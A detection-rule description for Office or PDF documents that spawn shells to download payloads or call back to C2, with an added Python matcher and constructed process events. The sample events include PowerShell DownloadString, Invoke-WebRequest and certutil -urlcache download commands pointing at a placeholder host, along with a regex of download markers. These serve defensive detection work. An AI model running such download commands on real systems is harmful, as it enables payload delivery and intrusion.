APT Office/PDF Document Spawning Shell with C2 Callback (APT3 / Spear-Phishing)
Detects Office or PDF documents spawning shell processes whose CommandLine indicates payload download or C2 callback. This is a core pattern in spear-phishing campaigns by APT3 and other advanced actors, which use email-based TTPs for initial access.
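
The matching logic this rule describes, run over process-creation events, as an added example that is not the rule's own source. The parent and shell process names, the command-line markers, and the Sysmon-style field names (`ParentImage`, `Image`, `CommandLine`) are assumptions, and the sample events are constructed.

```python
import re
from ntpath import basename  # parses Windows paths on any OS

# Assumed lists: the page does not enumerate the rule's process names.
DOC_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe",
               "acrord32.exe", "acrobat.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe",
          "cscript.exe", "mshta.exe"}
# Assumed markers of payload download or network callback in a command line.
NET_MARKERS = re.compile(
    r"https?://|downloadstring|downloadfile|invoke-webrequest|"
    r"net\.webclient|bitsadmin|certutil\b.*-urlcache",
    re.IGNORECASE)

def is_suspicious(event):
    """True when a document reader spawns a shell whose command line reaches the network."""
    parent = basename(event.get("ParentImage", "")).lower()
    child = basename(event.get("Image", "")).lower()
    return (parent in DOC_PARENTS and child in SHELLS
            and bool(NET_MARKERS.search(event.get("CommandLine", ""))))

def detect(events):
    """Return the ids of events that satisfy all three conditions."""
    return [e["id"] for e in events if is_suspicious(e)]

# Constructed sample events (Sysmon Event ID 1 style fields), not real telemetry.
SAMPLE_EVENTS = [
    {"id": 1, "ParentImage": r"C:\Program Files\Microsoft Office\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -c (New-Object Net.WebClient)"
                    ".DownloadString('http://example.invalid/a')"},
    {"id": 2, "ParentImage": r"C:\Program Files\Microsoft Office\WINWORD.EXE",
     "Image": r"C:\Windows\splwow64.exe",       # printing helper, not a shell
     "CommandLine": "splwow64.exe 8192"},
    {"id": 3, "ParentImage": r"C:\Windows\explorer.exe",  # parent is not a document app
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe Invoke-WebRequest https://example.invalid/"},
    {"id": 4, "ParentImage": r"C:\Program Files (x86)\Adobe\Reader\AcroRd32.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c certutil.exe -urlcache -f http://example.invalid/a.bin"},
    {"id": 5, "ParentImage": r"C:\Program Files\Microsoft Office\EXCEL.EXE",
     "Image": r"C:\Windows\System32\cmd.exe",   # shell child, but no network marker
     "CommandLine": "cmd.exe /c dir"},
]

if __name__ == "__main__":
    print(detect(SAMPLE_EVENTS))
```

Events 2, 3 and 5 each fail exactly one of the three conditions, which shows why the rule needs the parent, the child and the command line together to keep false positives down.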